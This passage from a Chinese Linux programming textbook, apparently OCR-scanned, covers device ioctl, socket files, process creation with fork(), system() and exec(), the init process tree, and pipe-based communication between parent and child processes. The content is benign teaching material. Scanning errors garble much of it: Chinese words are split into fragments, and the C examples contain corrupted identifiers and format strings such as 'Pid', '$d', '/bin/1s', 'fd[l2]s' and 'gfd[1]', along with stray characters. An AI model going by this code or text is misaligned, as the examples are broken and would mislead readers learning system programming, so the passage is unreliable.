/* 打 开 CDROM 设备 文件 */ 
08 if(fd < 0){ 
09 printf ("打开 CDROM 失败 \n") ; 
10 return -1; 
Ll } 
12 /* 向 Linux 内 核 的 CDROM 驱动 程序 发 送 CDROMEJECT 请 求 */ 
13 if (!ioctl (fd,CDROMEJECT,NULL)){ /* 驱 动 程序 操作 成 功 */ 
14 printf ("成 功 弹出 CDROM\n"); 
下 5 }else{ /* 驱 动 程序 操作 失败 */ 
16 printf ("弹出 CDROM 失败 \n"); 
1 } 
18 
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19 close (fd) ; /* 关 闭 CDROM 设备 文件 */ 
20 return 0; 
2 


3.3 ”socket 文件 类 型 


在 Linux 下 面 还 有 一 类 比较 特殊 的 文件 ， 即 socket 文件 。 它 是 一 种 网 络 接口 的 抽象 ， 
与 普通 文件 一 样 ，socket 文件 描述 符 支 持 read() 函 数 、write() 函 数 操作 ， 并 可 以 使 用 fent10 
函数 进行 文件 控制 。socket 文件 类 型 的 具体 操作 将 在 后 面 的 章节 进行 讲解 。 


3.4 小 结 


本 章 介 绍 了 Linux 下 的 文件 系统 。Linux 的 文件 系统 是 一 个 树 状 的 结构 ， 通 过 虚拟 文 
件 系 统 VFS，Linux 在 各 种 各 样 的 文件 系统 上 面 建立 了 统一 的 操作 API， 例 如 读数 据 、 写 
数据 等 。 这 种 抽象 机 制 不 仅仅 对 普通 文件 有 效 ， 同 样 可 以 操作 各 种 各 样 的 设备 ， 例 如 帧 组 
冲 设备 等 。 对 文件 进行 编程 的 函数 比较 琐碎 ， 这 是 由 于 使 用 的 多 样 性 造成 的 。 

文件 的 lseek 操作 是 进行 文件 偏 移 量 指针 的 移动 ， 可 以 将 其 移 到 超出 文件 末尾 的 位 置 ， 
来 制造 “空洞 ”文件 。mmap() 函 数 是 一 种 将 文件 和 地 址 空间 进行 映射 的 方法 , 映射 成 功 后 ， 
可 以 像 操作 内 存 一 样 对 文件 内 容 进 行 读 写 。ioctl0 函 数 和 fnctl0 函 数 都 是 控制 的 接口 ， 控 制 
的 内 容 由 传送 的 命令 决定 ， 这 是 内 核 和 应 用 层 直接 通信 的 一 种 方法 。 在 Linux 上 目录 也 是 
文件 的 一 种 ， 操 作 方 式 与 文件 一 致 。 
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进程 是 操作 系统 最 重要 的 核心 概念 之 一 ， 对 进程 的 不 同 实现 方式 造成 了 目前 操作 系统 
的 一 种 分 类 方法 , 例如 DOS 系统 为 单 进程 的 操作 系统 。 在 本 章 中 将 介绍 Linux 中 进程 的 概 
念 和 相关 的 操作 函数 ， 并 对 线程 的 程序 设计 方法 进行 比较 多 的 介绍 ， 主 要 包括 如 下 内 容 : 

口 进程 、 线 程 和 程序 的 概念 和 它们 之 间 的 区 别 ; 

口 进程 的 产生 方式 ，fork()、system()、exec() 函 数 等 ; 

口 Linux 进程 间 的 通信 和 同步 方式 ， 包 括 管道 pipe、 命 名 管道 fifo、 信 号 量 sem、 共 
享 缓冲 区 shm、 消 息 队 列 msg， 以 及 信号 signal。 对 其 原理 和 编程 函数 进行 详细 的 
讲解 ， 并 例 举 丰 富 的 代码 例子 ; 

口 对 Linux 下 的 线程 编程 方式 进行 详细 介绍 ， 并 介绍 互 斥 、 条 件 变量 、 线 程 信号 等 
编程 实现 方法 。 


4.1 程序 、 进 程 和 线程 的 概念 


在 计算 机 上 运行 的 程序 是 一 组 指令 及 指令 参数 的 组 合 ， 指 令 按 照 既 定 的 逻辑 控制 计算 
机 运行 。 进 程 则 是 运行 着 的 程序 ， 是 操作 系统 执行 的 基本 单位 。 线 程 则 是 为 了 节省 资源 而 
可 以 在 同一 个 进程 中 共享 资源 的 一 个 执行 单位 。 


4.1.1 程序 和 进程 的 差别 


进程 的 出 现 最 初 是 在 UNIX 下 ， 用 于 表示 多 用 户 、 多 任务 的 操作 系统 环境 下 ， 应 用 程 
序 在 内 存 环境 中 基本 执行 单元 的 概念 。 进 程 是 UNIX 操作 系统 环境 中 的 基本 概念 ， 是 系统 
资源 分 配 的 最 小 单位 。UNIX 操作 系统 下 的 用 户 管理 和 资源 分 配 等 工作 几乎 都 是 操作 系统 
通过 对 应 用 程序 进程 的 控制 实现 的 。 

C、C++、Java 等 语言 编写 的 源 程序 经 相应 的 编译 器 编译 成 可 执行 文件 后 ， 提 交 给 计 
算 机 处 理 器 运行 。 应 用 程序 的 运行 状态 称 为 进程 。 
进程 从 用 户 角度 来 看 是 应 用 程序 的 一 个 执行 过 程 。 从 操作 系统 核心 角度 来 看 ， 进 程 代 
表 的 是 操作 系统 分 配 的 内 存 、CPU 时 间 片 等 资源 的 基本 单位 ， 是 为 正在 运行 的 程序 提供 的 
运行 环境 。 进 程 与 应 用 程序 的 区 别 在 于 应 用 程序 作为 一 个 静态 文件 存储 在 计算 机 系统 的 硬 
盘 等 存储 空间 中 ， 而 进程 则 是 处 于 动态 条 件 下 由 操作 系统 维护 的 系统 资源 管理 实体 。 
进程 概念 和 程序 概念 最 大 的 不 同 之 处 在 于 : 
口 进程 是 动态 的 ， 而 程序 是 静态 的 ; 
口 进程 有 一 定 的 生命 期 ， 而 程序 是 指令 的 集合 ， 本 身 无 “运动 ”的 含义 。 没 有 建立 
进程 的 程序 不 能 作为 1 个 独立 单位 得 到 操作 系统 的 认可 ; 
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口 一 个 进程 只 能 对 应 一 个 程序 ， 一 个 程序 可 以 对 应 多 个 进程 。 进 程 和 程序 的 关系 就 
像 戏 剧 和 剧本 之 间 的 关系 。 


4.1.2 Linux 环境 下 的 进程 


Linux 的 进程 操作 方式 主要 有 产生 进程 、 终 止 进程 ， 并 且 进 程 之 间 存 在 数据 和 控制 的 
交互 ， 即 进程 问 通 信和 同步 。 


1. 进程 的 产生 过 程 


进程 的 产生 有 多 种 方式 ， 其 基本 过 程 是 一 致 的 。 
(1) 首先 复制 其 父 进程 的 环境 配置 。 

(2) 在 内 核 中 建立 进程 结构 。 

(3) 将 结构 插入 到 进程 列表 ， 便 于 维护 。 

(4) 分 配 资源 给 此 进程 。 

(5) 复制 父 进程 的 内 存 映 射 信息 。 

(6) 管理 文件 描述 符 和 链接 点 。 

(7) 通知 父 进程 。 


2. 进程 的 终止 方式 


有 5 种 方式 使 进程 终止 。 

口 从 main 返回 。 

口 调用 exit。 

口 调用 _exit。 

口 调用 abort。 

口 由 一 个 信号 终止 。 

进程 在 终止 的 时 候 ,系统 会 释放 进程 所 拥有 的 资源 ,例如 内 存 、 文 件 符 和 内 核 结构 等 。 

3. 进程 之 间 的 通信 

进程 之 间 的 通信 有 多 种 方式 ， 其 中 管道 、 共 享 内 存 和 消息 队列 是 最 常用 的 方式 。 

口 管道 是 UNIX 族 中 进程 通信 的 最 古老 的 方式 ， 它 利用 内 核 在 两 个 进程 之 间 建 立 通 
道 ， 它 的 特点 是 与 文件 的 操作 类 似 ， 仅 仅 在 管道 的 一 端 上 只 读 ， 另 一 端 只 写 。 利 用 
读 写 的 方式 在 进程 之 间 传递 数据 。 

口 共享 内 存 是 将 内 存 中 的 一 段 地 址 ， 在 多 个 进程 之 间 共 享 。 多 个 进程 利用 获得 的 共 
享 内 存 的 地 址 来 直接 对 内 存 进行 操作 。 

口 消息 队列 则 是 在 内 核 中 建立 一 个 链表 ， 发 送 方 按照 一 定 的 标识 将 数据 发 送 到 内 核 
中 ， 内 核 将 其 放 入 量 表 后 ， 等 待 接收 方 的 请 求 。 接 收 方 发 送 请 求 后 ， 内 核 按照 消 
息 的 标识 ， 从 内 核 中 将 消息 从 链表 中 摘 下 ， 传 递 给 接收 方 。 消 息 队 列 是 一 种 完全 
的 异步 操作 方式 。 


4. 进程 之 间 的 同步 
多 个 进程 之 间 需 要 协作 完成 任务 时 ， 经 常 发 生 任务 之 间 的 依赖 现象 ， 从 而 出 现 了 进程 
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的 同步 问题 。Linux 下 进程 的 同步 方式 主要 有 消息 队列 、 信 号 量 等 。 
信和 号 量 是 一 个 共享 的 表示 数量 的 值 。 用 于 多 个 进程 之 间 操 作 或 者 共享 资源 的 保护 ， 它 
是 进程 之 间 同 步 的 最 主要 方式 。 


4.1.3 ”进程 和 线程 


线程 和 进程 是 另 一 对 有 意义 的 概念 ， 主 要 区 别 和 联系 如 下 。 

口 进程 是 操作 系统 进行 资源 分 配 的 基本 单位 ， 进 程 拥有 完整 的 虚拟 空间 。 进 行 系统 
资源 分 配 的 时 候 ， 除 了 CPU 资源 之 外 ， 不 会 给 线程 分 配 独立 的 资源 ， 线 程 所 需要 
的 资源 需要 共享 。 

口 线程 是 进程 的 一 部 分 ， 如 果 没 有 进行 显 式 地 线程 分 配 ， 可 以 认为 进程 是 单线 程 的 ; 
如 果 进 程 中 建立 了 线程 ， 则 可 以 认为 系统 是 多 线程 的 。 

口 多 线程 和 多 进程 是 两 种 不 同 的 概念 ， 虽 然 二 者 都 是 并 行 完成 功能 。 但 是 ， 多 个 线 
程 之 间 像 内 存 、 变 量 等 资源 可 以 通过 简单 的 办 法 共享 ， 多 进程 则 不 同 ， 进 程 间 的 
共享 方式 有 限 。 

口 进程 有 进程 控制 表 PCB, 系统 通过 PCB 对 进程 进行 调度 ; 线程 有 线程 控制 表 TCB。 
但 是 ，TCB 所 表示 的 状态 比 PCB 要 少 得 多 。 


4.2 ”进程 产生 的 方式 


进程 是 计算 机 中 运行 的 基本 单位 。 要 产生 一 个 进程 , 有 多 种 产生 方式 , 例如 使 用 fork() 
函数 、system() 函 数 、exec() 函 数 等 , 这些 函数 的 不 同 在 于 其 运行 环境 的 构造 之 间 存 在 差别 ， 
其 本 质 都 是 对 程序 运行 的 各 种 条 件 进行 设置 ， 在 系统 之 间 建 立 一 个 可 以 运行 的 程序 。 
4.2.1 进程 号 

每 个 进程 在 初始 化 的 时 候 ， 系 统 都 分 配 了 一 个 ID 号 ， 用 于 标识 此 进程 。 在 Linux 中 进 
程 号 是 唯一 的 ， 系 统 可 以 用 这 个 值 来 表示 一 个 进程 ， 描 述 进程 的 ID 号 通常 叫做 PID， 即 进 
程 ID (process id)。PID 的 变量 类 型 为 pid_t。 

1. getpid()、getppid() 函 数 介绍 


getpid() 函 数 返回 当前 进程 的 ID 号 ,getppid() 返 回 当前 进程 的 父 进程 的 ID 号 。 类 型 pid f 
其 实 是 一 个 typedef 类 型 ， 定 义 为 unsigned int。getpid() 函 数 和 getppid() 函 数 的 原型 如 下 : 


#include <sys/types.h> 
#include <unistd.h> 
pid t getpid(void); 
pid t getppid(void); 


2. getpid() 函 数 的 例子 


下 面 是 一 个 使 用 getpid0 函 数 和 getppid0) 函 数 的 例子 。 程 序 获取 当前 程序 的 PID 和 父 程 
序 的 PID。 
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01 #include <sys/types.h> 
02 #include <unistd.h> 

03 #include<stdio.h> 

04 int main() 


SS 

06 pid t pid,ppid; 

07 

08 /* 获得 当前 进程 和 其 父 进程 的 ID 号 */ 

09 Pid = getpid(); 

10 PPid = getppid(); 

i 

12 printf ("当前 进程 的 ID 号 为 : $d\n",pid); 
13 printf ("当前 进程 的 的 父 进程 号 ID 号 为 : %$d\n",ppid); 
14 

15 return 0; 

Eo 


对 上 述 程 序 进 行 编译 ， 在 系统 上 进行 运行 ， 其 结果 为 : 

当前 进程 的 ID 号 为 : 16957 

当前 进程 的 的 父 进 程 号 ID 号 为 : 16878 

可 以 知道 ， 进 程 的 ID 号 为 16957， 其 父 进 程 的 ID 号 为 16878。 
4.2.2 ”进程 复制 fork() 


产生 进程 的 方式 比较 多 ，fork() 是 其 中 的 一 种 方式 。fork() 函 数 以 父 进 程 为 蓝本 复制 一 
个 进程 ， 其 ID 号 和 父 进 程 ID 号 不 同 。 在 Linux 环境 下 ，fork() 是 以 写 复制 实现 的 ， 只 有 内 
存 等 与 父 进程 不 同时 ， 其 他 与 父 进程 共享 ， 只 有 在 父 进 程 或 者 子 进 程 进行 了 修改 后 ， 才 重 
新 生成 一 份 。 


1. fork() 函 数 介绍 
forkO) 函 数 的 原型 如 下 ， 当 成 功 时 ，forkO) 函 数 的 返回 值 是 进程 的 ID;， 失败 则 返回 -1 。 


#include <sys/types.h> 
#include <unistd.h> 
pid t fork(void); 


fork() 的 特点 是 执行 一 次 , 返回 两 次 。 在 父 进程 和 子 进程 中 返回 的 是 不 同 的 值 , 父 进 程 
中 返回 的 是 子 进程 的 ID 号 ， 而 子 进程 中 则 返回 0。 


2. fork() 函 数 的 例子 


下 面 是 一 个 使 用 fork0 函 数 的 例子 。 在 调用 fork0 函 数 之 后 ,判断 fork0 函 数 的 返回 值 : 
如 果 为 -1， 打 印 失败 信息 ; 如 果 为 0， 打 印 子 进程 信息 ;如果 大 于 0， 打印 父 进 程 信息 。 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <unistd.h> 

04 #include <sys/types.h> 
05 int main(void) 

06 { 

07 pid t pid; 
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09 /* 分 又 进程 */ 

10 Pid = fork() 

3 

2 /* 判断 是 否 执 行 成 功 */ 

3 if(-1 == pid){ 

14 printf ("进程 创建 失败 ! \n")， 

15 return -1; 

16 } else if(pid == 0){ 

Fly /* 子 进程 中 执行 此 段 代 码 */ 

18 Printf(" 子 进程 ,fork 返回 值 : %d，ID:%d， 父 进程 ID:%d\n",pid, 
getpid(),getppid () ) 

正和 } elsel{ 

20 /* 父 进程 中 执行 此 段 代码 */ 

21 printf(" 父 进程 ,fork 返回 值 : %d，ID:%d， 父 进程 ID:%d\n",pid, 
getpid(),getppid()); 

22 } 

EE 

24 return 0; 

a 


执行 此 段 程序 的 结果 为 : 

父 进程 , fork 返回 值 ，17025，ID:17024， 父 进程 ID:16878 

子 进程 , fork 返回 值 : 0，ID:17025， 父 进程 ID:17024 

Fork 出 来 的 子 进程 的 父 进 程 ID 号 是 执行 fork() 函 数 的 进程 的 ID 号 。 
4.2.3 system() 方 式 

system() 函 数 调用 shell 的 外 部 命令 在 当前 进程 中 开始 另 一 个 进程 。 

1. system() 函 数 介 绍 

system() 函 数 调用 “/bin/sh-c command ”执行 特定 的 命令 ， 阻 塞 当前 进程 直到 command 
命令 执行 完毕 。system() 函 数 的 原型 如 下 : 
#include <stdlib.h> 
int system(const char *command); 
执行 system() 函 数 时 ， 会 调用 fork()、execve()、waitpid() 等 函数 ， 其 中 任意 一 个 调用 失 
将 导致 system() 函 数 调 用 失败 。system() 函 数 的 返回 值 如 下 : 
口 失败 ， 返 回 -1; 
口 当 sh 不 能 执行 时 ， 返 回 127; 
口 成 功 ， 返 回 进程 状态 值 。 
2. system() 函 数 的 例子 
例如 下 面 的 代码 获得 当前 进程 的 ID, 并 使 用 system() 函 数 进行 系统 调用 ping 网 络 上 的 
某 个 主机 ， 程 序 中 将 当前 系统 分 配 的 PID 值 和 进行 system() 函 数 调用 的 返回 值 都 进行 了 
打印 : 


01 #include<stdio.h> 
02 #include<unistd.h> 


败 
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03 #include<stdlib.h> 
04 int main() 


Qs 

06 int ret; 

07 

08 printf ("系统 分 配 的 进程 号 是 : $d\n", getpid()); 
09 ret = system("ping www.baidu.com -c 2"); 
10 printf ("返回 值 为 : $d\n", ret); 

1 return 0; 

2 


对 上 述 代 码 进行 进行 编译 ， 执 行 编译 后 的 程序 ， 其 执行 结果 为 : 


系统 分 配 的 进程 号 是 : 17068 

PING www.a.shifen.com (61.135.169.125) 56(84) bytes of data. 
64 bytes from 61.135.169.125: icmp req=1 ttl=128 time=13.2 ms 
64 bytes from 61.135.169.125: icmp_ req=2 ttl=128 time=12.8 ms 


--- www.a.shifen.com ping statistics --- 
2 packets transmitted, 2 received, 0% packet loss, time 7124ms 
rtt min/avg/max/mdev = 12.840/13.058/13.276/0.218 ms 


返回 值 为 : 0 

系统 分 配给 当前 进程 的 ID 号 为 17068; 然后 系统 ping 了 网 络 上 的 某 个 主机 ， 发 送 和 
接收 两 个 ping 的 请 求 包 ， 再 退出 ping 程序 ， 此 时 系统 的 返回 值 在 原来 的 程序 中 才 返 回 ， 
在 测试 的 时 候 返 回 的 是 0。 


4.2.4 进程 执行 exec() 函 数 系列 


在 使 用 fork() 函 数 和 system() 函 数 的 时 候 ， 系 统 中 都 会 建立 一 个 新 的 进程 ， 执 行 调用 者 
的 操作 ， 而 原来 的 进程 还 会 存在 ， 直 到 用 户 显 式 地 退出 ;而 exec() 族 的 函数 与 之 前 的 fork() 
和 system() 函 数 不 同 ，exec() 族 函数 会 用 新 进程 代替 原 有 的 进程 ， 系 统 会 从 新 的 进程 运行 ， 
新 进程 的 PID 值 会 与 原来 进程 的 PID 值 相 同 。 


1. exec() 函 数 介绍 


exec() 族 函数 共有 6 个 ， 其 原型 如 下 : 


#include <unistd.h> 

extern char **environ; 

int execl (const char *path, const char *arg, ...); 

int execlp(const char *file, const char *arg, ...); 

int execle (Const char *path, const char *arg, ..., Char * const envp[]); 
int execv(const char *path, char *Const argv[]); 

int execvp(const char *file, char *const argv[]); 


上 述 6 个 函数 中 ， 只 有 execve() 函 数 是 真正 意义 上 的 系统 调用 ， 其 他 5 个 函数 都 是 在 
此 基础 上 经 过 包装 的 库 函 数 。 上 述 的 exec() 函 数 族 的 作用 是 ， 在 当前 系统 的 可 执行 路 径 中 
根据 指定 的 文件 名 来 找到 合适 的 可 执行 文件 名 ， 并 用 它 来 取代 调用 进程 的 内 容 ， 即 在 原来 
的 进程 内 部 运行 一 个 可 执行 文件 。 上 述 的 可 执行 文件 既 可 以 是 二 进 制 的 文件 ， 也 可 以 是 可 
执行 的 脚本 文件 。 

与 fork() 函 数 不 同 ，exec() 函 数 族 的 函数 执行 成 功 后 不 会 返回 ， 这 是 因为 执行 的 新 程序 
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已 经 占用 了 当前 进程 的 空间 和 资源 ， 这 些 资 源 包 括 代 码 段 、 数 据 段 和 堆栈 等 ， 它 们 都 已 经 
被 新 的 内 容 取代 ， 而 进程 的 ID 等 标识 性 的 信息 仍然 是 原来 的 东西 ， 即 exec(0) 函 数 族 在 原来 
进程 的 壳 上 运行 了 自己 的 程序 ， 只 有 程序 调用 失败 了 ， 系 统 才 会 返回 -1。 

使 用 exec(0) 函 数 比 较 普 遍 的 一 种 方法 是 先 使 用 forkO 函 数 分 又 进程 , 然后 在 新 的 进程 中 
调用 exec() 函 数 ， 这 样 exec() 函 数 会 占用 与 原来 一 样 的 系统 资源 来 运行 。 

Linux 系统 针对 上 述 过 程 专门 进行 了 优化 。 由 于 fork() 的 过 程 是 对 原 有 系统 进行 复制 ， 
然后 建立 子 进程 ， 这 些 过 程 都 比较 耗费 时 间 。 如 果 在 fork() 系 统 调用 之 后 进行 exec() 系 统 调 
让 ， 系 统 就 不 会 进行 系统 复制 ， 而 是 直接 使 用 exec(0) 指 定 的 参数 来 覆盖 原 有 的 进程 。 上 述 
的 方法 在 Linux 系统 上 叫做 “ 写 时 复制 ” 即 只 有 在 造成 系统 的 内 容 发 生 更 改 的 时 候 才 进行 
进程 的 真正 更 新 。 

2. ececve() 函 数 的 例子 

execve() 函 数 的 例子 如 下 。 例 子 程序 中 先 打印 调用 进程 的 进程 号 ,然后 调用 execve() 函 
数 ， 这 个 函数 调用 可 执行 文件 “/bim/ls” 列 出 当前 目录 下 的 文件 。 

01 #include<stdio.h> 


02 #include<unistd.h> 
03 int main(void) 


04 { 

05 char *args[]={"/bin/ls",NULL}; 

06 printf ("系统 分 配 的 进程 号 是 : %d\n", getpid()); 
07 if (execve("/bin/1s",args,NULL) <0) 

08 printf ("创建 进程 出 错 ! \n") 

09 

10 return 0; 

Ee 


4.2.5 ”所 有 用 户 态 进程 的 产生 进程 init 


在 Linux 系统 中 ,所 有 的 进程 都 是 有 父子 或 者 堂 兄 关系 的 , 除了 初始 进程 init, 没有 哪 
个 进程 与 其 他 进程 完全 独立 。 系 统 中 每 个 进程 都 有 一 个 父 进程 ， 新 的 进程 不 是 被 全 新 地 创 
建 ， 通 常 是 从 一 个 原 有 的 进程 进行 复制 或 者 克隆 的 。 

Linux 操作 系统 下 的 每 一 个 进程 都 有 一 个 父 进程 或 者 兄弟 进程 ,并 且 有 自己 的 子 进程 。 
可 以 在 Linux 下 使 用 命令 pstree 来 查看 系统 中 运行 的 进程 之 间 的 关系 ， 如 下 所 示 。 可 以 看 
出 ，init 进程 是 所 有 进程 的 祖先 ， 其 他 的 进程 都 是 由 init 进程 直接 或 者 间接 fork() 出 来 的 。 

init——NetworkManager—T—dhclient 

| ansmasq 


| L- 一 2* [{NetworkManager}] 
| 一 accounts-daemon: {accounts-daemon} 


Facpid 

Fat-spi-bus-laun 2*[{at-spi-bus-laun}] 
上 Ed 

上 一 avahi-daemon: avahi-daemon 

上 一 bamfdaemon- 2*[{bamfdaemon}] 
Hbluetoothd 

eolcre 2*[{colord}] 
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Hconsole-kit-dae 

eron 

Hcupsd 

上 一 2* [dbus-daemon] 

上 一 abus-launch 

上 一 aconf-service: 

上 一 gconfd-2 

Hgeany—r—bash——pstree 
Fgeany 

| C3*[{geany}] 

上 一 geoclue-maste 

上 一 6x [getty] 

上 一 gnome-keyring-d 

上 一 goa-daemon: 

上 一 gvfs-afc-volume: 

上 一 gvfs-fuse-daemo- 

上 一 gvfs-gdu-volume 

上 一 gvfs-gphoto2-vo 


上 一 gvfsd 
上 一 ... 


64*[{console-kit-dae}] 


2*[{dconf-service}] 


6*[{gnome-keyring-d}] 
{go0a-daemon} 
{gvfs-afc-volume} 
4*[{gvfs-fuse-daemo}] 


4. 3 进程 间 ; 通信 和 同步 


在 Linux 下 的 多 个 进程 间 的 通信 机 制 叫做 PC， 它 是 多 个 进程 之 间 相 互 沟通 的 一 种 方 
法 。 在 Linux 下 有 多 种 进程 问 通信 的 方法 : 半 双 工 管道 、FIFO 命名 管道 )、 消 息 队列 、 
信号 量 、 共 享 内 存 等 。 使 用 这 些 通信 机 制 可 以 为 Linux 下 的 网 络 服务 器 开发 提供 灵活 而 又 
坚固 的 框架 。 


4.3.1 半 双 工 管道 


管道 是 一 种 把 两 个 进程 之 间 的 标准 输入 和 标准 输出 连接 起 来 的 机 制 。 管 道 是 一 种 历史 
悠久 的 进程 间 通 信 的 办 法 ， 自 UNIX 操作 系统 诞生 ， 管 道 就 存在 了 。 


1. 基本 概念 


由 于 管道 仅仅 是 将 某 个 进程 的 输出 和 另 一 -个 进程 的 输入 相连 接 的 单 向 通信 的 办 法 ， 因 
此 称 其 为 “ 半 双 工 ”。 在 shell 中 管道 用 “|” 表 示 ， 如 图 4.1 所 示 ， 是 管道 的 一 种 使 用 方式 。 


ls -1 管道 grep*.c 


$1ls -llgrep *.c 


把 ls -1 的 输出 当做 “grep *.c” 的 输入 ,管道 在 前 一 个 进程 中 建立 输入 通道 ， 在 后 一 个 
进程 建立 输出 通道 ， 将 数据 从 管道 的 左边 传输 到 管道 的 右边 ， 将 ls -1 的 输出 通过 管道 传 给 
xi 

进程 创建 管道 ， 每 次 创建 两 个 文件 描述 符 来 操作 管道 。 其 中 一 个 对 管道 进行 写 操作 ， 
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一 个 描述 符 对 管道 进行 读 操作 。 如 图 4.2 所 示 ， 显 示 了 管道 如 何 将 两 个 进程 通过 内 核 连 
we 从 图 4.2 中 可 以 看 出 这 两 个 文件 描述 符 是 如 何 连接 在 一 起 的 。 如 果 进 程 通过 管道 
faa[0] 发 送 数据 ， 它 可 以 从 fdb[0] 获 得 信息 。 


faa[0] fdb[0] 
进程 A Linux 内 核 进程 B 


fda[1] fdb[1] 


图 4.2 用 管道 进行 进程 间 的 通信 


由 于 进程 A 和 进程 B 都 能 够 访问 管道 的 两 个 描述 符 , 因此 管道 创建 完毕 后 要 设置 在 各 
个 进程 中 的 方向 ， 希 望 数据 向 那个 方向 传输 。 这 需要 做 好 规划 ， 两 个 进程 都 要 做 统一 的 设 
置 ， 在 进程 A 中 设置 为 读 的 管道 描述 符 , 在 进程 B 中 要 设置 为 写 ; 反之 亦 然 ， 并 且 要 把 不 
关心 的 管道 端 关 掉 。 对 管道 的 读 写 与 一 般 的 IO 系统 函数 一 致 ， 使 用 write() 函 数 写 入 数据 ， 
read() 函 数 读 出 数据 ， 某 些 特定 的 IO 操作 管道 是 不 支持 的 ， 例 如 偏 移 函 数 lseek()。 


2. pipe() 函 数 介绍 
创建 管道 的 函数 原型 为 : 


#include <unistd.h> 

int pipe(int filedes[2]); 

数组 中 的 fledes 是 一 个 文件 描述 符 的 数组 ， 用 于 保存 管道 返回 的 两 个 文件 描述 符 。 数 
组 中 的 第 1 个 元 素 〈 下 标 为 0) 是 为 了 读 操 作 而 创建 和 打开 的 ， 而 第 2 个 元 素 (下 标 为 1) 
是 为 了 写 操作 而 创建 和 打开 的 。 直 观 地 说 ， 人 fal 的 输出 是 fd0 的 输入 。 当 函数 执行 成 功 时 ， 
返回 0， 失 败 时 返回 值 为 -1。 建 立 管道 的 代码 如 下 : 

#include <stdio.h> 

#include <unistd.h> 

#include <sys/types.h> 


int main (void) 


{ 


int result = -1; /* 创 建 管道 结果 */ 
result = pipe (fd); /* 创 建 管道 #/ 
if( -1 == result) /* 创 建 失败 */ 
{ 
printf ("建立 管道 失败 \n"); /* 打 印信 息 */ 
return -1; /* 返 回 错误 */ 
上 
/# 正 常 程 序 处 理 过 程 */ 


只 建立 管道 看 起 来 没有 什么 用 处 ， 要 使 管道 有 切实 的 用 处 ， 需 要 与 进程 的 创建 结合 
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来 ， 利 上 


两 个 管道 在 父 进程 和 子 进程 之 间 进 行 通信 。 如 图 4.3 所 示 ， 在 父 进程 和 子 进程 之 
间 建 立 一 个 管道 ， 子 进程 向 管道 中 写 入 数据 ， 父 进程 从 管道 中 读 取 数据 。 要 实现 这 样 的 模 


在 子 进程 中 需要 关闭 读 端 


四 
SI 


Linux 内 核 


1 


图 4.3 ”父子 进程 之 间 的 通信 


3. pipe() 函 数 的 例子 
为 了 便于 理解 ， 建 立 两 个 变量 write_ fd 和 read_ fd， 分 别 指向 ft[1] 和 fa[0]， 代 码 如 下 : 


#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <sys/types.h> 
int main (void) 


{ 


int result = -1; 
int fd[l2]s 
pid t pid; 


/* 创 建 管道 结果 */ 
/* 文 件 描述 符 , 字符 个 数 */ 
/*PID 值 */ 


/* 文件 描述 符 1 用 于 写 ,文件 描述 符 0 用 于 读 */ 


int *write fd = gfd[1]; 
int *read fd = gfd[0]; 


result = pipe (fd); 

if( -1 == result) 

{ 
printf ("建立 管道 失败 \n")， 
return -1; 


卜 


pid = fork() 

if( -1 == pid) 

{ 
printf ("fork 进程 失败 \n")， 
return -1; 


if( 0 == pid) 
{ 
close(*read fd); 
} 
else 


{ 


/* 写 文件 描述 符 */ 
/* 读 文件 描述 符 */ 


/* 建 立 管道 */ 
/* 建 立 管道 失败 */ 


/* 打 印信 息 */ 

/* 返 回 错误 结果 */ 
/* 分 叉 程序 */ 
/*fork 失败 */ 
/* 打 印信 息 */ 

/* 返 回 错误 结果 */ 
7* 了 于 进程 x*/ 

/* 关 闭 读 端 */ 


/* 父 进程 */ 
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35 close (*write fd) /* 关 闭 写 端 */ 
36 ) 

Sm 

38 return 0; 

39 } 


如 图 4.3 所 示 的 模型 ， 在 子 进程 中 可 以 向 管道 写 入 数据 ， 而 写 入 的 数据 可 以 从 父 进程 
中 读 出 。 其 完整 的 代码 如 下 ， 子 进程 中 向 管道 写 入 “你 好 , 管道 ”, 父 进程 中 读 出 这 些 信 息 。 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <string.h> 

04 #include <unistd.h> 

05 #include <sys/types.h> 
06 int main(void) 


TO 

08 int result = -1; /* 创 建 管道 结果 */ 

09 int fd[2],nbytes; /* 文 件 描述 符 , 字 符 个 数 */ 

10 Pid t pids /*PID 值 */ 

二 二 char string[] = "你 好 ,管道 "; 

2 char readbuffer[80]; 

13 /* 文件 描述 符 1 用 于 写 ,文件 描述 符 0 用 于 读 */ 

14 int *write fd = &fd[1]; /* 写 文件 描述 符 */ 

5 int *read fd = &fd[0]; /* 读 文件 描述 符 */ 

16 

i result = pipe (fd); /* 建 立 管道 */ 

18 if( -1 == result) /* 建 立 管道 失败 */ 

19 { 

20 printf ("建立 管道 失败 \n")， /* 打 印信 息 */ 

21 return -1; /* 返 回 错误 结果 */ 

区 } 

23 

24 pid = fork(); /* 分 叉 程序 */ 

25 eal it = eleh) /*fork 失败 */ 

26 

2 Printf("fork 进程 失败 \n"); /* 打 印信 息 */ 

28 return -1; /* 返 回 错误 结果 */ 

29 和 

30 

31 LE( 0 == pid) /* 子 进程 */ 

32 { 

3 close (*read fd); /* 关 闭 读 端 */ 

34 result = write(*write fd,string,strlen(string)); 
/* 向 管道 端 写 入 字符 */ 

35 return 0; 

36 3 

Eh else /* 父 进程 */ 

38 { 

39 close (*write fd); /* 关 闭 写 端 */ 

40 nbytes = read(*read fd, readbuffer,sizeof (readbuffer)); 
/* 从 管道 读 取 数值 */ 

41 printf ("接收 到 %d 个 数据 , 内 容 为 :"%s"\n",nbytes, readbuffer); 
/* 打 印 结果 */ 

42 } 

43 
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44 return 0; 
45 } 
运行 的 结果 为 : 


接收 到 15 个 数据 , 内 容 为 :" 你 好 , 管道 " 


4. 管道 阻塞 和 管道 操作 的 原子 性 


当 管 道 的 写 端 没 有 关闭 时 ， 如 果 写 请 求 的 字 节 数 日 大 于 阔 值 PIPE_BUF， 写 操作 的 返 
回 值 是 管道 中 目前 的 数据 字 节 数 。 如 果 请 求 的 字 节 数目 不 大 于 PIPE_BUF， 则 返回 管道 中 
现 有 数据 字 节 数 (此 时 , 管道 中 数据 量 小 于 请 求 的 数据 量 ); 或 者 返回 请 求 的 字 节 数 (此 时 ， 
管道 中 数据 量 不 小 于 请 求 的 数据 量 )。 


全 注意 : PIPE BUF 在 include/Linux/limits.h 中 定义 ， 不 同 的 内 核 版 本 可 能 会 有 所 不 同 。 
Posix.1 要 求 PIPE BUF 至少 为 512 字 节 。 


